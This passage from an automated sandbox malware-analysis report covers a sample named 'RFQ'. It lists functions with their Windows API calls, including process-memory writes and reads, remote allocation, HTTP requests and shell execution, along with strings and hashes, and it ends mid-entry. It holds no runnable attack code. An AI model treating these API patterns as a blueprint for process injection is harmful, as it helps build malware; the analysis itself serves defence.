                                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                          • API String ID: 708495834-557222456
                                                                          • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                          • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                          • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                          • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                          Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                            • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                            • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                            • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                            • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                          • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                          • String ID: @
                                                                          • API String ID: 4150878124-2766056989
                                                                          • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                          • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                          • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                          • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                          Function 0044F137 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: \$]$h
                                                                          • API String ID: 4104443479-3262404753
                                                                          • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                          • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                                          • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                          • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                                          Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                          • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                          • String ID: <$@
                                                                          • API String ID: 2417854910-1426351568
                                                                          • Opcode ID: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                                                                          • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                          • Opcode Fuzzy Hash: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                                                                          • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                          Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                            • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                          • String ID:
                                                                          • API String ID: 3705125965-3916222277
                                                                          • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                          • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                          • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                          • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                          Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                          • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                          • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Delete$InfoItem
                                                                          • String ID: 0
                                                                          • API String ID: 135850232-4108050209
                                                                          • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                          • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                          • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                          • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                                          Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long
                                                                          • String ID: SysTreeView32
                                                                          • API String ID: 847901565-1698111956
                                                                          • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                          • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                          • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                          • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                          Function 00434B02 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                          • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                          • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Library$AddressFreeLoadProc
                                                                          • String ID: AU3_GetPluginDetails
                                                                          • API String ID: 145871493-4132174516
                                                                          • Opcode ID: eeab42aefd2d36d06d7687f66def4b4fc74e6333f2f3c4216b61849e5f0d6007
                                                                          • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                          • Opcode Fuzzy Hash: eeab42aefd2d36d06d7687f66def4b4fc74e6333f2f3c4216b61849e5f0d6007
                                                                          • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                                          Function 00450D6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window
                                                                          • String ID: SysMonthCal32
                                                                          • API String ID: 2326795674-1439706946
                                                                          • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                          • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                                          • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                          • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                                          Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: DestroyWindow
                                                                          • String ID: msctls_updown32
                                                                          • API String ID: 3375834691-2298589950
                                                                          • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                          • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                          • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                          • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                          Function 0044DC13 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: $<
                                                                          • API String ID: 4104443479-428540627
                                                                          • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                          • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                                          • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                          • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                                          Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$DiskFreeSpace
                                                                          • String ID: \VH
                                                                          • API String ID: 1682464887-234962358
                                                                          • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                          • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                          • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                          • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                          Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$DiskFreeSpace
                                                                          • String ID: \VH
                                                                          • API String ID: 1682464887-234962358
                                                                          • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                          • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                          • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                          • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                          Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$DiskFreeSpace
                                                                          • String ID: \VH
                                                                          • API String ID: 1682464887-234962358
                                                                          • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                          • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                          • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                          • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                          Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                          Strings
                                                                          Memory Dump Source
